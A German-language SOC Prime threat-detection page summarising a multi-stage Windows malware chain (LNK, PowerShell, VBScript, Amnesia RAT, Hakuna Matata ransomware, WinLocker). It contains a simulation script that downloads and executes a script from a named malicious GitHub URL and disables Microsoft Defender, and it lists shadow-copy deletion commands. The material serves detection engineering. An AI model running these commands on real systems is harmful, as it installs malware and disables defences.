SOC Prime Bias: Hoch

04 Feb. 2026 17:20
newspaper icon Fortinet Blog

Ein genauer Blick auf eine mehrstufige Windows-Malware-Operation

Author Photo
Ruslan Mikhalov Leiter der Bedrohungsforschung bei SOC Prime linkedin icon Folgen
Ein genauer Blick auf eine mehrstufige Windows-Malware-Operation
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

FortiGuard Labs identifizierte eine mehrstufige Windows-Einbruchskette, die mit einer bösartigen LNK-Datei beginnt, die innerhalb eines komprimierten Archivs bereitgestellt wird. Die Verknüpfung startet einen ersten PowerShell-Loader, der nachfolgende Skripte von GitHub abruft und später die Kontrolle an einen verschleierten VBScript-Orchestrator übergibt. Der Workflow versucht dann, die Endpunktabwehr zu schwächen, indem er Microsoft Defender deaktiviert, das Defendnot-Dienstprogramm bereitstellt und sowohl Amnesia RAT als auch Hakuna Matata Ransomware bereitstellt. Der Vorgang endet mit dem Ablegen einer WinLocker-Komponente, die den Desktop sperrt, um die Wiederherstellung zu stören und Opfer unter Druck zu setzen.

Untersuchung

Ermittler rekonstruierten den Ausführungsweg von der durch LNK ausgelösten PowerShell-Phase zu einem VBScript, das Nutzdaten im Speicher wiederherstellt, was schließlich zur Bereitstellung von Ransomware und Desktop-Sperrverhalten führt. Abwehrmaßnahmen wurden durch gezielte Registry-Änderungen und durch das Injizieren einer Defendnot-DLL in Taskmgr.exe umgangen. Persistenz wurde durch eine Kombination von Run-Key-Einträgen und Startup-Ordner-Artefakten implementiert, um die Kette nach der Anmeldung erneut auszulösen.

Abschwächung

Überwachen Sie auf verdächtige registrybasierte Richtlinienänderungen unter HKLMSOFTWAREPoliciesMicrosoftWindows Defender und HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies. Blockieren Sie den Egress zu bekannten bösartigen GitHub- und Dropbox-URLs, die zum Staging verwendet werden, und alarmieren Sie bei PowerShell-Download-und-Execute-Mustern, die von LNK-Starts ausgehen. Setzen Sie Anwendungs-Whitelisting durch und verschärfen Sie die PowerShell-Ausführungsrichtlinien, um skriptbasierte anfängliche Zugriffe zu reduzieren.

Reaktion

Wenn erkannt, isolieren Sie den Endpunkt, stellen die Defender-bezogenen Registry-Einstellungen in einen bekannten guten Zustand wieder her und entfernen bösartige Dateien und Persistenzeinträge. Suchen Sie nach aktiven Amnesia RAT Prozessen und assoziierter Netzwerkaktivität und überprüfen Sie, ob Ransomware-Ausführung stattgefunden hat. Führen Sie eine vollständige forensische Untersuchung durch, um den Umfang des Schadens zu bestimmen und Überreste zu beseitigen, dann stellen Sie Systeme von sauberen Backups wieder her, wo dies möglich ist.

graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff6666 %% Node definitions step_a[„<b>Aktion</b> – <b>T1566.001 Phishing: Anhang</b><br/>LNK-Datei „Задание_для_бухгалтера_02отдела.txt.lnk“ innerhalb eines komprimierten Archivs“] class step_a action step_b[„<b>Aktion</b> – <b>T1059.001 PowerShell</b><br/>Die LNK-Datei startet PowerShell mit -ExecutionPolicy Bypass zum Herunterladen des Skripts „kira.ps1““] class step_b action step_c[„<b>Aktion</b> – <b>T1027 Verschleierte Dateien oder Informationen</b><br/>VBScript „SCRRC4ryuk.vbe“ kodiert mit Script Encoder Plus, Base64 und RC4“] class step_c action step_d[„<b>Aktion</b> – <b>T1562.001 Beeinträchtigung von Abwehrmechanismen</b><br/>PowerShell deaktiviert die Echtzeitüberwachung von Microsoft Defender und fügt weitreichende Dateisystem-Ausschlüsse hinzu“] class step_d action step_e[„<b>Aktion</b> – <b>T1218.010 Proxy-Ausführung über Regsvr32</b><br/>Defendnot-DLL und Loader werden bereitgestellt und in den vertrauenswürdigen Prozess Taskmgr.exe injiziert“] class step_e action step_f[„<b>Aktion</b> – <b>T1548.002 Umgehung der Benutzerkontensteuerung</b><br/>ShellExecute-runas-Schleife wird verwendet, um erhöhte Rechte zu erlangen“] class step_f action step_g[„<b>Aktion</b> – <b>T1547.001 Registry-Run-Schlüssel / Autostart-Ordner</b><br/>Erstellt einen Eintrag unter HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run und kopiert „svchost.scr“ nach %PROGRAMDATA% und in den Autostart-Ordner des Benutzers“] class step_g action step_h[„<b>Aktion</b> – <b>T1082 Systeminformationssammlung</b><br/>Sammelt Betriebssystem-, Hardware-, Domänen- und IP-Informationen über WMI“] class step_h action step_i[„<b>Aktion</b> – <b>T1057 Prozesserkennung</b><br/>Listet laufende Prozesse auf, um doppelte Ausführung zu vermeiden“] class step_i action step_j[„<b>Aktion</b> – <b>T1113 Bildschirmaufnahme</b><br/>„TelegramWorker.scr“ erstellt Screenshots (1.png–30.png) und sendet sie über Telegram“] class step_j action step_k[„<b>Aktion</b> – <b>T1555 Zugangsdaten aus Passwortspeichern</b><br/>Extrahiert Passwörter und Cookies aus Chromium-Browsern mithilfe von DPAPI“] class step_k action step_l[„<b>Aktion</b> – <b>T1539 Diebstahl von Websitzungs-Cookies</b><br/>Sammelt Cookies und Tokens aus Browsern“] class step_l action step_m[„<b>Aktion</b> – <b>T1550.004 Verwendung alternativer Authentifizierungsmaterialien</b><br/>Kapert Telegram-Desktop-Sitzungsdateien aus „tdata““] class step_m action step_n[„<b>Aktion</b> – <b>T1102.002 Webdienst</b><br/>Übermittelt gesammelte Daten und Screenshots über die Telegram-Bot-API an den Angreifer“] class step_n action step_o[„<b>Schadsoftware</b> – <b>T1486 Datenverschlüsselung mit Auswirkungen</b><br/>Die Ransomware Hakuna Matata „WmiPrvSE.scr“ verschlüsselt Dateien mit der Erweiterung @NeverMind12F“] class step_o malware step_p[„<b>Aktion</b> – <b>T1490 Verhinderung der Systemwiederherstellung</b><br/>Führt „reagentc /disable“, „wbadmin delete catalog“ und „vssadmin delete shadows /all“ aus“] class step_p action step_q[„<b>Schadsoftware</b> – <b>T1499 Denial-of-Service am Endpunkt</b><br/>WinLocker „gedion.scr“ erstellt den Mutex WINLOCK… und sperrt den Desktop“] class step_q malware %% Connections step_a –>|leads_to| step_b step_b –>|leads_to| step_c step_c –>|leads_to| step_d step_d –>|leads_to| step_e step_e –>|leads_to| step_f step_f –>|leads_to| step_g step_g –>|leads_to| step_h step_h –>|leads_to| step_i step_i –>|leads_to| step_j step_j –>|leads_to| step_k step_k –>|leads_to| step_l step_l –>|leads_to| step_m step_m –>|leads_to| step_n step_n –>|leads_to| step_o step_o –>|leads_to| step_p step_p –>|leads_to| step_q

Angriffsablauf

Simulation Execution

Voraussetzung: Der Telemetrie- & Baseline-Pre-Flight-Check muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die dazu bestimmt ist, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN direkt die identifizierten TTPs widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.

  • Angriffserzählung & Befehle:
    Ein Angreifer, der anfänglichen Zugriff auf den Endpunkt erlangt hat, möchte eine bösartige PowerShell-Nutzlast herunterladen und ausführen, während er die Standardeinstellung der Ausführungsrichtlinie umgeht. Sie nutzen Invoke-Expression (iex) kombiniert mit Invoke-WebRequest (irm) um ein Skript von einer entfernten GitHub-Raw-URL abzurufen und es unter -ExecutionPolicy Bypassausführen zu lassen. Nach der Einrichtung der Persistenz deaktivieren sie die Echtzeitüberwachung von Windows Defender, um die Erkennung der nachfolgenden Nutzlasten zu vermeiden. Diese Schritte erzeugen direkt die Befehlszeilen-Strings, für die die Sigma-Regel überwacht.

  • Regressionstest-Skript:

    # --------------------------------------------------------------
# Schritt 1 – Führen Sie das Remote-Skript mit ExecutionPolicy Bypass aus
# --------------------------------------------------------------
$maliciousUrl = "https://github.com/Mafin111/MafinREP111/raw/refs/heads/main/ps1/kira.ps1"
powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "irm '$maliciousUrl' | iex"

# --------------------------------------------------------------
# Schritt 2 – Deaktivieren Sie die Echtzeitüberwachung von Windows Defender
# --------------------------------------------------------------
# Deaktivieren Sie den Echtzeitschutz
Disable-MpPreference -DisableRealtimeMonitoring $true
# Eine Ausschlusspfad hinzufügen (simuliert)
Add-MpPreference -ExclusionPath "C:TempExcludeFolder"

  • Aufräumbefehle:

    # Reaktivieren Sie die Echtzeitüberwachung von Windows Defender
Enable-MpPreference -DisableRealtimeMonitoring $false

# Entfernen Sie den Ausschlusspfad (falls vorhanden)
Remove-MpPreference -ExclusionPath "C:TempExcludeFolder" -ErrorAction SilentlyContinue

# Stoppen Sie alle verbleibenden PowerShell-Prozesse, die vom Skript gestartet wurden
Get-Process -Name powershell | Where-Object {$_.StartInfo.Arguments -match 'kira.ps1'} | Stop-Process -Force

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten